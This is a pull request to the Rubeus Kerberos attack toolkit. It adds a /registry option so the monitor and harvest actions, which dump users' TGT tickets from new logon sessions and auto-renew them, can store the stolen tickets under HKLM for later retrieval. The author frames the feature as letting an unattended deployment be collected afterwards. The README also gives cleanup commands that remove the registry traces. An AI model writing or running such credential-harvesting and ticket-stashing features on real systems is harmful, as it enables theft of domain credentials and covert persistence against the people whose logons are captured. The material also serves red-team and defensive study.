### PR TITLE
Feature: Logging to Registry

### DIFF
--- a/README.md
+++ b/README.md
@@ -760,6 +760,8 @@ The **monitor** action will monitor the event log for 4624 logon events and will
 
 When the /filteruser (or if not specified, any user) creates a new 4624 logon event, any extracted TGT KRB-CRED data is output.
 
+Further, if you wish to save the output to the registry, pass the /registry flag and specfiy a path under HKLM to create (i.e., `/registry:SOFTWARE\MONITOR`). Then you can remove this entry after you've finished running Rubeus by `Get-Item HKLM:\SOFTWARE\MONITOR\ | Remove-Item -Recurse -Force`.
+
     c:\Rubeus>Rubeus.exe monitor /filteruser:dfm.a
 
        ______        _
@@ -821,6 +823,8 @@ When the /filteruser (or if not specified, any user) creates a new 4624 logon ev
 The **harvest** action takes monitor one step further. It monitors the event log for 4624 events every /interval:MINUTES for new logons, extracts any new TGT KRB-CRED files, and keeps a cache of any extracted TGTs. On the /interval, any TGTs that will expire before the next interval are automatically renewed (up until their renewal limit), and the current cache of "usable"/valid TGT KRB-CRED .kirbis are output as base64 blobs.
 
 This allows you to harvest usable TGTs from a system without opening up a read handle to LSASS, though elevated rights are needed to extract the tickets.
+
+Further, you can pass the /registry flag to save the tickets into the registry for later extraction, such as `/registry:SOFTWARE\HARVEST`. You can remove the registry save data by `Get-Item HKLM:\SOFTWARE\HARVEST\ | Remove-Item -Recurse -Force`.
 
     c:\Rubeus>Rubeus.exe harvest /interval:30
 

--- a/README.md
+++ b/README.md
@@ -63,11 +63,11 @@ Rubeus is licensed under the BSD 3-Clause license.
     Retrieve a usable TGT .kirbi for the current user (w/ session key) without elevation by abusing the Kerberos GSS-API, faking delegation:
         Rubeus.exe tgtdeleg [/target:SPN]
 
-    Monitor every SECONDS (default 60 seconds) for 4624 logon events and dump any TGT data for new logon sessions:
-        Rubeus.exe monitor [/interval:SECONDS] [/filteruser:USER]
+    Monitor every SECONDS (default 60 seconds) for 4624 logon events, dump any TGT data for new logon sessions, and save data to specified registry path (Default: Disabled):
+        Rubeus.exe monitor [/interval:SECONDS] [/filteruser:USER] [/registry:PATH\UNDER\HKLM]
 
-    Monitor every MINUTES (default 60 minutes) for 4624 logon events, dump any new TGT data, and auto-renew TGTs that are about to expire:
-        Rubeus.exe harvest [/interval:MINUTES]
+    Monitor every MINUTES (default 60 minutes) for 4624 logon events, dump any new TGT data, and auto-renew TGTs that are about to expire, and save TGTs to a specified registry path (Default: Disabled):
+        Rubeus.exe harvest [/interval:MINUTES] [/registry:PATH\UNDER\HKLM]
 
 
   NOTE: Base64 ticket blobs can be decoded with :

--- a/Rubeus/Commands/HarvestCommand.cs
+++ b/Rubeus/Commands/HarvestCommand.cs
@@ -10,12 +10,17 @@ namespace Rubeus.Commands
         public void Execute(Dictionary<string, string> arguments)
         {
             int intervalMinutes = 60;
+            string registryBasePath = null;
             if (arguments.ContainsKey("/interval"))
             {
                 intervalMinutes = Int32.Parse(arguments["/interval"]);
             }
+            if (arguments.ContainsKey("/registry"))
+            {
+                registryBasePath = arguments["/registry"];
+            }
 
-            Harvest.HarvestTGTs(intervalMinutes);
+            Harvest.HarvestTGTs(intervalMinutes, registryBasePath);
         }
     }
 }

--- a/Rubeus/Commands/Monitor.cs
+++ b/Rubeus/Commands/Monitor.cs
@@ -11,6 +11,7 @@ namespace Rubeus.Commands
         {
             string targetUser = "";
             int interval = 60;
+            string registryBasePath = null;
             if (arguments.ContainsKey("/filteruser"))
             {
                 targetUser = arguments["/filteruser"];
@@ -19,7 +20,11 @@ namespace Rubeus.Commands
             {
                 interval = Int32.Parse(arguments["/interval"]);
             }
-            Harvest.Monitor4624(interval, targetUser);
+            if (arguments.ContainsKey("/registry"))
+            {
+                registryBasePath = arguments["/registry"];
+            }
+            Harvest.Monitor4624(interval, targetUser, registryBasePath);
         }
     }
 }

--- a/Rubeus/Domain/Info.cs
+++ b/Rubeus/Domain/Info.cs
@@ -66,10 +66,10 @@ namespace Rubeus.Domain
             Console.WriteLine("        Rubeus.exe tgtdeleg [/target:SPN]");
 
             Console.WriteLine("\r\n    Monitor every SECONDS (default 60) for 4624 logon events and dump any TGT data for new logon sessions:");
-            Console.WriteLine("        Rubeus.exe monitor [/interval:SECONDS] [/filteruser:USER]");
+            Console.WriteLine("        Rubeus.exe monitor [/interval:SECONDS] [/filteruser:USER] [/registry:SOFTWARENAME]");
 
             Console.WriteLine("\r\n    Monitor every MINUTES (default 60) for 4624 logon events, dump any new TGT data, and auto-renew TGTs that are about to expire:");
-            Console.WriteLine("        Rubeus.exe harvest [/interval:MINUTES]");
+            Console.WriteLine("        Rubeus.exe harvest [/interval:MINUTES] [/registry:SOFTWARENAME]");
 
             Console.WriteLine("\r\n\r\n  NOTE: Base64 ticket blobs can be decoded with :");
             Console.WriteLine("\r\n      [IO.File]::WriteAllBytes(\"ticket.kirbi\", [Convert]::FromBase64String(\"aa...\"))\r\n");

--- a/Rubeus/lib/Harvest.cs
+++ b/Rubeus/lib/Harvest.cs
@@ -9,7 +9,7 @@ namespace Rubeus
 {
     public class Harvest
     {
-        public static void HarvestTGTs(int intervalMinutes)
+        public static void HarvestTGTs(int intervalMinutes, string registryBasePath)
         {
             // First extract all TGTs then monitor the event log (indefinitely) for 4624 logon events
             //  every 'intervalMinutes' and dumps TGTs JUST for the specific logon IDs (LUIDs) based on the event log.
@@ -133,12 +133,15 @@ namespace Rubeus
 
                 Console.WriteLine("\r\n[*] {0} - Current usable TGTs:\r\n", DateTime.Now);
                 LSA.DisplayTGTs(creds);
-
+                if (registryBasePath != null)
+                {
+                    LSA.SaveTicketsToRegistry(creds, registryBasePath);
+                }
                 System.Threading.Thread.Sleep(intervalMinutes * 60 * 1000);
             }
         }
 
-        public static void Monitor4624(int intervalSeconds, string targetUser)
+        public static void Monitor4624(int intervalSeconds, string targetUser, string registryBasePath = null)
         {
             // monitors the event log (indefinitely) for 4624 logon events every 'intervalSeconds' and dumps TGTs JUST for the specific
             //  logon IDs (LUIDs) based on the event log. Can optionally only extract for a targeted user.
@@ -224,7 +227,7 @@ namespace Rubeus
                                         {
                                             seenLUIDs[luid] = true;
                                             // if we haven't seen it, extract any TGTs for that particular logon ID
-                                            LSA.ListKerberosTicketData(luid, "krbtgt", true);
+                                            LSA.ListKerberosTicketData(luid, "krbtgt", true, registryBasePath);
                                         }
                                     }
                                     catch (Exception e)


### PR DESCRIPTION
There have been scenarios where I want to deploy Rubeus, set it and forget it for a period of time and check up on it later. The `/registry` argument has been added to `monitor` and `harvest` functions to save the data to a path in the registry for later extraction.

Example usage:

`.\Rubeus.exe monitor /registry:SOFTWARE\MONITOR` - Sticks user ticket data under HKLM:\SOFTWARE\MONITOR.